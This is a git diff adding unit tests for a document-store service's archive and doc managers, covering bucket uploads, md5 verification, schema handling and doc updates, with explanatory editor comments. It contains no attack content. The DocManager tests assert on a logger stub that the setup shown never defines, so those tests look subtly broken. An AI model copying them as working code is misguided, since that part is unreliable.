PersistorManager, + MongoManager, + RangeManager, + Settings, + Crypto, + StreamUtils, + HashDigest, + HashUpdate, + archivedDocs, + mongoDocs, + archivedDoc, + archivedDocJson, + md5Sum, + projectId, + readStream, + stream, + streamToBuffer + + beforeEach(function () { + md5Sum = 'decafbad' + + RangeManager = { + jsonRangesToMongo: sinon.stub().returns({ mongo: 'ranges' }), + } + Settings = { + docstore: { + backend: 'gcs', + bucket: 'wombat', + }, + parallelArchiveJobs: 3, + } + HashDigest = sinon.stub().returns(md5Sum) + HashUpdate = sinon.stub().returns({ digest: HashDigest }) + Crypto = { + createHash: sinon.stub().returns({ update: HashUpdate }), + } + StreamUtils = { + ReadableString: sinon.stub().returns({ stream: 'readStream' }), + } + + projectId = new ObjectId() + archivedDocs = [ + { + _id: new ObjectId(), + inS3: true, + rev: 2, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 4, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 6, + }, + ] + mongoDocs = [ + { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['aaa', 'bbb', 'ccc'], + rev: 4, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 6, + }, + { + _id: new ObjectId(), + inS3: true, + rev: 6, + }, + { + _id: new ObjectId(), + lines: ['111', '222', '333'], + rev: 6, + }, + ] + + archivedDoc = { + lines: mongoDocs[0].lines, + rev: mongoDocs[0].rev, + } + + archivedDocJson = JSON.stringify({ ...archivedDoc, schema_v: 1 }) + + stream = { + on: sinon.stub(), + resume: sinon.stub(), + } + 
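+    // Editor's note: `stream` fakes an event-based read stream. The two
+    // `withArgs(...).yields(...)` stubs below make any registered 'data'
+    // handler receive the archived JSON immediately and any 'end' handler
+    // fire straight away, so helper code of the form
+    //   stream.on('data', chunk => chunks.push(chunk))
+    //   stream.on('end', () => resolve(Buffer.concat(chunks)))
+    // completes synchronously under test.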
stream.on.withArgs('data').yields(Buffer.from(archivedDocJson, 'utf8')) + stream.on.withArgs('end').yields() + + readStream = { + stream: 'readStream', + } + + PersistorManager = { + getObjectStream: sinon.stub().resolves(stream), + sendStream: sinon.stub().resolves(), + getObjectMd5Hash: sinon.stub().resolves(md5Sum), + deleteObject: sinon.stub().resolves(), + deleteDirectory: sinon.stub().resolves(), + } + + const getNonArchivedProjectDocIds = sinon.stub() + getNonArchivedProjectDocIds + .onCall(0) + .resolves(mongoDocs.filter(doc => !doc.inS3).map(doc => doc._id)) + getNonArchivedProjectDocIds.onCall(1).resolves([]) + + const getArchivedProjectDocs = sinon.stub() + getArchivedProjectDocs.onCall(0).resolves(archivedDocs) + getArchivedProjectDocs.onCall(1).resolves([]) + + const fakeGetDoc = async (_projectId, _docId) => { + if (_projectId.equals(projectId)) { + for (const mongoDoc of mongoDocs.concat(archivedDocs)) { + if (mongoDoc._id.equals(_docId)) { + return mongoDoc + } + } + } + throw new Errors.NotFoundError() + } + + MongoManager = { + promises: { + markDocAsArchived: sinon.stub().resolves(), + restoreArchivedDoc: sinon.stub().resolves(), + upsertIntoDocCollection: sinon.stub().resolves(), + getProjectsDocs: sinon.stub().resolves(mongoDocs), + getNonDeletedArchivedProjectDocs: getArchivedProjectDocs, + getNonArchivedProjectDocIds, + getArchivedProjectDocs, + findDoc: sinon.stub().callsFake(fakeGetDoc), + getDocForArchiving: sinon.stub().callsFake(fakeGetDoc), + destroyProject: sinon.stub().resolves(), + }, + } + + // Wrap streamToBuffer so that we can pass in something that it expects (in + // this case, a Promise) rather than a stubbed stream object + streamToBuffer = { + promises: { + streamToBuffer: async () => { + const inputStream = new Promise(resolve => { + stream.on('data', data => resolve(data)) + }) + + const value = await StreamToBuffer.streamToBuffer( + 'testProjectId', + 'testDocId', + inputStream + ) + + return value + }, + }, + } + + DocArchiveManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': Settings, + crypto: Crypto, + '@overleaf/stream-utils': StreamUtils, + './MongoManager': MongoManager, + './RangeManager': RangeManager, + './PersistorManager': PersistorManager, + './Errors': Errors, + './StreamToBuffer': streamToBuffer, + }, + }) + }) + + describe('archiveDoc', function () { + it('should resolve when passed a valid document', async function () { + await expect( + DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + ).to.eventually.be.fulfilled + }) + + it('should throw an error if the doc has no lines', async function () { + const doc = mongoDocs[0] + doc.lines = null + + await expect( + DocArchiveManager.promises.archiveDoc(projectId, doc._id) + ).to.eventually.be.rejectedWith('doc has no lines') + }) + + it('should add the schema version', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[1]._id) + expect(StreamUtils.ReadableString).to.have.been.calledWith( + sinon.match(/"schema_v":1/) + ) + }) + + it('should calculate the hex md5 sum of the content', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(Crypto.createHash).to.have.been.calledWith('md5') + expect(HashUpdate).to.have.been.calledWith(archivedDocJson) + expect(HashDigest).to.have.been.calledWith('hex') + }) + + it('should pass the md5 hash to the object persistor for verification', async function () { + await 
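+      // Editor's note: the assertions around this call pin down the upload
+      // integrity check; sketched from the expectations (not the verbatim
+      // implementation), the archive path looks roughly like:
+      //   const json = JSON.stringify({ ...doc, schema_v: 1 })
+      //   const md5 = crypto.createHash('md5').update(json).digest('hex')
+      //   await persistor.sendStream(bucket, `${projectId}/${docId}`, stream, {
+      //     sourceMd5: md5,
+      //   })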
DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + + expect(PersistorManager.sendStream).to.have.been.calledWith( + sinon.match.any, + sinon.match.any, + sinon.match.any, + { sourceMd5: md5Sum } + ) + }) + + it('should pass the correct bucket and key to the persistor', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + + expect(PersistorManager.sendStream).to.have.been.calledWith( + Settings.docstore.bucket, + `${projectId}/${mongoDocs[0]._id}` + ) + }) + + it('should create a stream from the encoded json and send it', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(StreamUtils.ReadableString).to.have.been.calledWith( + archivedDocJson + ) + expect(PersistorManager.sendStream).to.have.been.calledWith( + sinon.match.any, + sinon.match.any, + readStream + ) + }) + + it('should mark the doc as archived', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[0]._id, + mongoDocs[0].rev + ) + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should bail out early', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.getDocForArchiving).to.not.have.been.called + }) + }) + + describe('with null bytes in the result', function () { + const _stringify = JSON.stringify + + beforeEach(function () { + JSON.stringify = sinon.stub().returns('{"bad": "\u0000"}') + }) + + afterEach(function () { + JSON.stringify = _stringify + }) + + it('should return an error', async function () { + await expect( + DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + ).to.eventually.be.rejectedWith('null bytes detected') + }) + }) + }) + + describe('unarchiveDoc', function () { + let docId, lines, rev + + describe('when the doc is in S3', function () { + beforeEach(function () { + MongoManager.promises.findDoc = sinon + .stub() + .resolves({ inS3: true, rev }) + docId = mongoDocs[0]._id + lines = ['doc', 'lines'] + rev = 123 + }) + + it('should resolve when passed a valid document', async function () { + await expect(DocArchiveManager.promises.unarchiveDoc(projectId, docId)) + .to.eventually.be.fulfilled + }) + + it('should test md5 validity with the raw buffer', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect(HashUpdate).to.have.been.calledWith( + sinon.match.instanceOf(Buffer) + ) + }) + + it('should throw an error if the md5 does not match', async function () { + PersistorManager.getObjectMd5Hash.resolves('badf00d') + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejected.and.be.instanceof(Errors.Md5MismatchError) + }) + + it('should restore the doc in Mongo', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, archivedDoc) + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should error out on archived doc', async function () { + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejected.and.match( + /found archived 
doc, but archiving backend is not configured/ + ) + }) + + it('should return early on non-archived doc', async function () { + MongoManager.promises.findDoc = sinon.stub().resolves({ rev }) + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect(PersistorManager.getObjectMd5Hash).to.not.have.been.called + }) + }) + + describe('doc contents', function () { + let archivedDoc + + describe('when the doc has the old schema', function () { + beforeEach(function () { + archivedDoc = lines + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should return the docs lines', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { lines, rev }) + }) + }) + + describe('with the new schema and ranges', function () { + beforeEach(function () { + archivedDoc = { + lines, + ranges: { json: 'ranges' }, + rev: 456, + schema_v: 1, + } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should return the doc lines and ranges', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { + lines, + ranges: { mongo: 'ranges' }, + rev: 456, + }) + }) + }) + + describe('with the new schema and no ranges', function () { + beforeEach(function () { + archivedDoc = { lines, rev: 456, schema_v: 1 } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should return only the doc lines', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { lines, rev: 456 }) + }) + }) + + describe('with the new schema and no rev', function () { + beforeEach(function () { + archivedDoc = { lines, schema_v: 1 } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should use the rev obtained from Mongo', async function () { + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect( + MongoManager.promises.restoreArchivedDoc + ).to.have.been.calledWith(projectId, docId, { lines, rev }) + }) + }) + + describe('with an unrecognised schema', function () { + beforeEach(function () { + archivedDoc = { lines, schema_v: 2 } + archivedDocJson = JSON.stringify(archivedDoc) + stream.on + .withArgs('data') + .yields(Buffer.from(archivedDocJson, 'utf8')) + }) + + it('should throw an error', async function () { + await expect( + DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejectedWith( + "I don't understand the doc format in s3" + ) + }) + }) + }) + }) + + it('should not do anything if the file is already unarchived', async function () { + MongoManager.promises.findDoc.resolves({ inS3: false }) + await DocArchiveManager.promises.unarchiveDoc(projectId, docId) + expect(PersistorManager.getObjectStream).not.to.have.been.called + }) + + it('should throw an error if the file is not found', async function () { + PersistorManager.getObjectStream = sinon + .stub() + .rejects(new Errors.NotFoundError()) + await expect( + 
DocArchiveManager.promises.unarchiveDoc(projectId, docId) + ).to.eventually.be.rejected.and.be.instanceof(Errors.NotFoundError) + }) + }) + + describe('destroyProject', function () { + describe('when archiving is enabled', function () { + beforeEach(async function () { + await DocArchiveManager.promises.destroyProject(projectId) + }) + + it('should delete the project in Mongo', function () { + expect(MongoManager.promises.destroyProject).to.have.been.calledWith( + projectId + ) + }) + + it('should delete the project in the persistor', function () { + expect(PersistorManager.deleteDirectory).to.have.been.calledWith( + Settings.docstore.bucket, + projectId + ) + }) + }) + + describe('when archiving is disabled', function () { + beforeEach(async function () { + Settings.docstore.backend = '' + await DocArchiveManager.promises.destroyProject(projectId) + }) + + it('should delete the project in Mongo', function () { + expect(MongoManager.promises.destroyProject).to.have.been.calledWith( + projectId + ) + }) + + it('should not delete the project in the persistor', function () { + expect(PersistorManager.deleteDirectory).not.to.have.been.called + }) + }) + }) + + describe('archiveAllDocs', function () { + it('should resolve with valid arguments', async function () { + await expect(DocArchiveManager.promises.archiveAllDocs(projectId)).to + .eventually.be.fulfilled + }) + + it('should archive all project docs which are not in s3', async function () { + await DocArchiveManager.promises.archiveAllDocs(projectId) + // not inS3 + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[0]._id + ) + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[1]._id + ) + expect(MongoManager.promises.markDocAsArchived).to.have.been.calledWith( + projectId, + mongoDocs[4]._id + ) + + // inS3 + expect( + MongoManager.promises.markDocAsArchived + ).not.to.have.been.calledWith(projectId, mongoDocs[2]._id) + expect( + MongoManager.promises.markDocAsArchived + ).not.to.have.been.calledWith(projectId, mongoDocs[3]._id) + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should bail out early', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.getNonArchivedProjectDocIds).to.not.have + .been.called + }) + }) + }) + + describe('unArchiveAllDocs', function () { + it('should resolve with valid arguments', async function () { + await expect(DocArchiveManager.promises.unArchiveAllDocs(projectId)).to + .eventually.be.fulfilled + }) + + it('should unarchive all inS3 docs', async function () { + await DocArchiveManager.promises.unArchiveAllDocs(projectId) + + for (const doc of archivedDocs) { + expect(PersistorManager.getObjectStream).to.have.been.calledWith( + Settings.docstore.bucket, + `${projectId}/${doc._id}` + ) + } + }) + + describe('when archiving is not configured', function () { + beforeEach(function () { + Settings.docstore.backend = undefined + }) + + it('should bail out early', async function () { + await DocArchiveManager.promises.archiveDoc(projectId, mongoDocs[0]._id) + expect(MongoManager.promises.getNonDeletedArchivedProjectDocs).to.not + .have.been.called + }) + }) + }) +}) diff --git a/services/docstore/test/unit/js/DocManagerTests.js b/services/docstore/test/unit/js/DocManagerTests.js new file mode 100644 index 0000000..8405520 --- /dev/null +++ 
b/services/docstore/test/unit/js/DocManagerTests.js @@ -0,0 +1,755 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DocManager' +) +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../../../app/js/Errors') + +describe('DocManager', function () { + beforeEach(function () { + this.doc_id = new ObjectId().toString() + this.project_id = new ObjectId().toString() + this.another_project_id = new ObjectId().toString() + this.stubbedError = new Error('blew up') + this.version = 42 + + this.MongoManager = { + promises: { + findDoc: sinon.stub(), + getProjectsDocs: sinon.stub(), + patchDoc: sinon.stub().resolves(), + upsertIntoDocCollection: sinon.stub().resolves(), + }, + } + this.DocArchiveManager = { + promises: { + unarchiveDoc: sinon.stub(), + unArchiveAllDocs: sinon.stub(), + archiveDoc: sinon.stub().resolves(), + }, + } + this.RangeManager = { + jsonRangesToMongo(r) { + return r + }, + shouldUpdateRanges: sinon.stub().returns(false), + } + this.settings = { docstore: {} } + + this.DocManager = SandboxedModule.require(modulePath, { + requires: { + './MongoManager': this.MongoManager, + './DocArchiveManager': this.DocArchiveManager, + './RangeManager': this.RangeManager, + '@overleaf/settings': this.settings, + './Errors': Errors, + }, + }) + }) + + describe('getFullDoc', function () { + beforeEach(function () { + this.DocManager.promises._getDoc = sinon.stub() + this.doc = { + _id: this.doc_id, + lines: ['2134'], + } + }) + + it('should call get doc with a quick filter', async function () { + this.DocManager.promises._getDoc.resolves(this.doc) + const doc = await this.DocManager.promises.getFullDoc( + this.project_id, + this.doc_id + ) + doc.should.equal(this.doc) + this.DocManager.promises._getDoc + .calledWith(this.project_id, this.doc_id, { + lines: true, + rev: true, + deleted: true, + version: true, + ranges: true, + inS3: true, + }) + .should.equal(true) + }) + + it('should return error when get doc errors', async function () { + this.DocManager.promises._getDoc.rejects(this.stubbedError) + await expect( + this.DocManager.promises.getFullDoc(this.project_id, this.doc_id) + ).to.be.rejectedWith(this.stubbedError) + }) + }) + + describe('getRawDoc', function () { + beforeEach(function () { + this.DocManager.promises._getDoc = sinon.stub() + this.doc = { lines: ['2134'] } + }) + + it('should call get doc with a quick filter', async function () { + this.DocManager.promises._getDoc.resolves(this.doc) + const doc = await this.DocManager.promises.getDocLines( + this.project_id, + this.doc_id + ) + doc.should.equal(this.doc) + this.DocManager.promises._getDoc + .calledWith(this.project_id, this.doc_id, { + lines: true, + inS3: true, + }) + .should.equal(true) + }) + + it('should return error when get doc errors', async function () { + this.DocManager.promises._getDoc.rejects(this.stubbedError) + await expect( + this.DocManager.promises.getDocLines(this.project_id, this.doc_id) + ).to.be.rejectedWith(this.stubbedError) + }) + }) + + describe('getDoc', function () { + beforeEach(function () { + this.project = { name: 'mock-project' } + this.doc = { + _id: this.doc_id, + project_id: this.project_id, + lines: ['mock-lines'], + version: this.version, + } + }) + + describe('when using a filter', function () { + beforeEach(function () { + this.MongoManager.promises.findDoc.resolves(this.doc) + }) + + it('should error if inS3 is 
not set to true', async function () { + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + inS3: false, + }) + ).to.be.rejected + }) + + it('should always get inS3 even when no filter is passed', async function () { + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id) + ).to.be.rejected + this.MongoManager.promises.findDoc.called.should.equal(false) + }) + + it('should not error if inS3 is set to true', async function () { + await this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + inS3: true, + }) + }) + }) + + describe('when the doc is in the doc collection', function () { + beforeEach(async function () { + this.MongoManager.promises.findDoc.resolves(this.doc) + this.result = await this.DocManager.promises._getDoc( + this.project_id, + this.doc_id, + { version: true, inS3: true } + ) + }) + + it('should get the doc from the doc collection', function () { + this.MongoManager.promises.findDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return the doc with the version', function () { + this.result.lines.should.equal(this.doc.lines) + this.result.version.should.equal(this.version) + }) + }) + + describe('when MongoManager.findDoc errors', function () { + it('should return the error', async function () { + this.MongoManager.promises.findDoc.rejects(this.stubbedError) + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + version: true, + inS3: true, + }) + ).to.be.rejectedWith(this.stubbedError) + }) + }) + + describe('when the doc is archived', function () { + beforeEach(async function () { + this.doc = { + _id: this.doc_id, + project_id: this.project_id, + version: 2, + inS3: true, + } + this.unarchivedDoc = { + _id: this.doc_id, + project_id: this.project_id, + lines: ['mock-lines'], + version: 2, + inS3: false, + } + this.MongoManager.promises.findDoc.resolves(this.doc) + this.DocArchiveManager.promises.unarchiveDoc.callsFake( + async (projectId, docId) => { + this.MongoManager.promises.findDoc.resolves({ + ...this.unarchivedDoc, + }) + } + ) + this.result = await this.DocManager.promises._getDoc( + this.project_id, + this.doc_id, + { + version: true, + inS3: true, + } + ) + }) + + it('should call the DocArchive to unarchive the doc', function () { + this.DocArchiveManager.promises.unarchiveDoc + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should look up the doc twice', function () { + this.MongoManager.promises.findDoc.calledTwice.should.equal(true) + }) + + it('should return the doc', function () { + expect(this.result).to.deep.equal({ + ...this.unarchivedDoc, + }) + }) + }) + + describe('when the doc does not exist in the docs collection', function () { + it('should return a NotFoundError', async function () { + this.MongoManager.promises.findDoc.resolves(null) + await expect( + this.DocManager.promises._getDoc(this.project_id, this.doc_id, { + version: true, + inS3: true, + }) + ).to.be.rejectedWith( + `No such doc: ${this.doc_id} in project ${this.project_id}` + ) + }) + }) + }) + + describe('getAllNonDeletedDocs', function () { + describe('when the project exists', function () { + beforeEach(async function () { + this.docs = [ + { + _id: this.doc_id, + project_id: this.project_id, + lines: ['mock-lines'], + }, + ] + this.MongoManager.promises.getProjectsDocs.resolves(this.docs) + this.DocArchiveManager.promises.unArchiveAllDocs.resolves(this.docs) + this.filter = { lines: true } + this.result = await 
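+        // Editor's note: the archived-doc tests above encode a transparent
+        // unarchive round trip; roughly (a sketch, not the verbatim code):
+        //   let doc = await MongoManager.findDoc(projectId, docId, filter)
+        //   if (doc && doc.inS3) {
+        //     await DocArchiveManager.unarchiveDoc(projectId, docId)
+        //     doc = await MongoManager.findDoc(projectId, docId, filter)
+        //   }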
this.DocManager.promises.getAllNonDeletedDocs(
+          this.project_id,
+          this.filter
+        )
+      })
+
+      it('should get the project from the database', function () {
+        this.MongoManager.promises.getProjectsDocs.should.have.been.calledWith(
+          this.project_id,
+          { include_deleted: false },
+          this.filter
+        )
+      })
+
+      it('should return the docs', function () {
+        expect(this.result).to.deep.equal(this.docs)
+      })
+    })
+
+    describe('when there are no docs for the project', function () {
+      it('should return a NotFoundError', async function () {
+        this.MongoManager.promises.getProjectsDocs.resolves(null)
+        this.DocArchiveManager.promises.unArchiveAllDocs.resolves(null)
+        await expect(
+          this.DocManager.promises.getAllNonDeletedDocs(
+            this.project_id,
+            this.filter
+          )
+        ).to.be.rejectedWith(`No docs for project ${this.project_id}`)
+      })
+    })
+  })
+
+  describe('patchDoc', function () {
+    describe('when the doc exists', function () {
+      beforeEach(function () {
+        this.lines = ['mock', 'doc', 'lines']
+        this.rev = 77
+        this.MongoManager.promises.findDoc.resolves({
+          _id: new ObjectId(this.doc_id),
+        })
+        this.meta = {}
+      })
+
+      describe('standard path', function () {
+        beforeEach(async function () {
+          await this.DocManager.promises.patchDoc(
+            this.project_id,
+            this.doc_id,
+            this.meta
+          )
+        })
+
+        it('should get the doc', function () {
+          expect(this.MongoManager.promises.findDoc).to.have.been.calledWith(
+            this.project_id,
+            this.doc_id
+          )
+        })
+
+        it('should persist the meta', function () {
+          expect(this.MongoManager.promises.patchDoc).to.have.been.calledWith(
+            this.project_id,
+            this.doc_id,
+            this.meta
+          )
+        })
+      })
+
+      describe('background flush disabled and deleting a doc', function () {
+        beforeEach(async function () {
+          this.settings.docstore.archiveOnSoftDelete = false
+          this.meta.deleted = true
+
+          await this.DocManager.promises.patchDoc(
+            this.project_id,
+            this.doc_id,
+            this.meta
+          )
+        })
+
+        it('should not flush the doc out of mongo', function () {
+          expect(this.DocArchiveManager.promises.archiveDoc).to.not.have.been
+            .called
+        })
+      })
+
+      describe('background flush enabled and not deleting a doc', function () {
+        beforeEach(async function () {
+          this.settings.docstore.archiveOnSoftDelete = true
+          this.meta.deleted = false
+          await this.DocManager.promises.patchDoc(
+            this.project_id,
+            this.doc_id,
+            this.meta
+          )
+        })
+
+        it('should not flush the doc out of mongo', function () {
+          expect(this.DocArchiveManager.promises.archiveDoc).to.not.have.been
+            .called
+        })
+      })
+
+      describe('background flush enabled and deleting a doc', function () {
+        beforeEach(function () {
+          this.settings.docstore.archiveOnSoftDelete = true
+          this.meta.deleted = true
+        })
+
+        describe('when the background flush succeeds', function () {
+          beforeEach(async function () {
+            await this.DocManager.promises.patchDoc(
+              this.project_id,
+              this.doc_id,
+              this.meta
+            )
+          })
+
+          it('should not log a warning', function () {
+            expect(this.logger.warn).to.not.have.been.called
+          })
+
+          it('should flush the doc out of mongo', function () {
+            expect(
+              this.DocArchiveManager.promises.archiveDoc
+            ).to.have.been.calledWith(this.project_id, this.doc_id)
+          })
+        })
+
+        describe('when the background flush fails', function () {
+          beforeEach(async function () {
+            this.err = new Error('foo')
+            this.DocArchiveManager.promises.archiveDoc.rejects(this.err)
+            await this.DocManager.promises.patchDoc(
+              this.project_id,
+              this.doc_id,
+              this.meta
+            )
+          })
+
+          it('should log a warning', function () {
+            
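+            // Editor's note: with archiveOnSoftDelete enabled, patchDoc kicks
+            // off the archive without awaiting it, so a failure must surface
+            // as a warning rather than a request error; sketched (not the
+            // verbatim implementation):
+            //   DocArchiveManager.archiveDoc(projectId, docId).catch(err =>
+            //     logger.warn(
+            //       { projectId, docId, err },
+            //       'archiving a single doc in the background failed'
+            //     )
+            //   )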
expect(this.logger.warn).to.have.been.calledWith( + sinon.match({ + projectId: this.project_id, + docId: this.doc_id, + err: this.err, + }), + 'archiving a single doc in the background failed' + ) + }) + }) + }) + }) + + describe('when the doc does not exist', function () { + it('should return a NotFoundError', async function () { + this.MongoManager.promises.findDoc.resolves(null) + await expect( + this.DocManager.promises.patchDoc(this.project_id, this.doc_id, {}) + ).to.be.rejectedWith( + `No such project/doc to delete: ${this.project_id}/${this.doc_id}` + ) + }) + }) + }) + + describe('updateDoc', function () { + beforeEach(function () { + this.oldDocLines = ['old', 'doc', 'lines'] + this.newDocLines = ['new', 'doc', 'lines'] + this.originalRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'foo', p: 3 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.newRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'bar', p: 6 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.version = 42 + this.doc = { + _id: this.doc_id, + project_id: this.project_id, + lines: this.oldDocLines, + rev: (this.rev = 5), + version: this.version, + ranges: this.originalRanges, + } + + this.DocManager.promises._getDoc = sinon.stub() + }) + + describe('when only the doc lines have changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + this.originalRanges + ) + }) + + it('should get the existing doc', function () { + this.DocManager.promises._getDoc + .calledWith(this.project_id, this.doc_id, { + version: true, + rev: true, + lines: true, + ranges: true, + inS3: true, + }) + .should.equal(true) + }) + + it('should upsert the document to the doc collection', function () { + this.MongoManager.promises.upsertIntoDocCollection + .calledWith(this.project_id, this.doc_id, this.rev, { + lines: this.newDocLines, + }) + .should.equal(true) + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev + 1 }) + }) + }) + + describe('when the doc ranges have changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.RangeManager.shouldUpdateRanges.returns(true) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines, + this.version, + this.newRanges + ) + }) + + it('should upsert the ranges', function () { + this.MongoManager.promises.upsertIntoDocCollection + .calledWith(this.project_id, this.doc_id, this.rev, { + ranges: this.newRanges, + }) + .should.equal(true) + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev + 1 }) + }) + }) + + describe('when only the version has changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines, + this.version + 1, + this.originalRanges + ) + }) + + it('should update the version', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.have.been.calledWith( + this.project_id, + this.doc_id, + 
this.rev, + { version: this.version + 1 } + ) + }) + + it('should return the old rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev }) + }) + }) + + describe('when the doc has not changed at all', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines, + this.version, + this.originalRanges + ) + }) + + it('should not update the ranges or lines or version', function () { + this.MongoManager.promises.upsertIntoDocCollection.called.should.equal( + false + ) + }) + + it('should return the old rev and modified == false', function () { + expect(this.result).to.deep.equal({ modified: false, rev: this.rev }) + }) + }) + + describe('when the version is null', function () { + it('should return an error', async function () { + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + null, + this.originalRanges + ) + ).to.be.rejectedWith('no lines, version or ranges provided') + }) + }) + + describe('when the lines are null', function () { + it('should return an error', async function () { + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + null, + this.version, + this.originalRanges + ) + ).to.be.rejectedWith('no lines, version or ranges provided') + }) + }) + + describe('when the ranges are null', function () { + it('should return an error', async function () { + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + null + ) + ).to.be.rejectedWith('no lines, version or ranges provided') + }) + }) + + describe('when there is a generic error getting the doc', function () { + beforeEach(async function () { + this.error = new Error('doc could not be found') + this.DocManager.promises._getDoc = sinon.stub().rejects(this.error) + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + this.originalRanges + ) + ).to.be.rejectedWith(this.error) + }) + + it('should not upsert the document to the doc collection', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.not.have.been + .called + }) + }) + + describe('when the version was decremented', function () { + it('should return an error', async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version - 1, + this.originalRanges + ) + ).to.be.rejectedWith(Errors.DocVersionDecrementedError) + }) + }) + + describe('when the doc lines have not changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines.slice(), + this.version, + this.originalRanges + ) + }) + + it('should not update the doc', function () { + this.MongoManager.promises.upsertIntoDocCollection.called.should.equal( + false + ) + }) + + it('should return the existing rev', function () { + expect(this.result).to.deep.equal({ modified: false, rev: this.rev }) + }) + }) + + describe('when the doc does not exist', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(null) + 
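+        // Editor's note: with no existing doc, updateDoc is expected to
+        // insert rather than modify, writing lines, ranges and version
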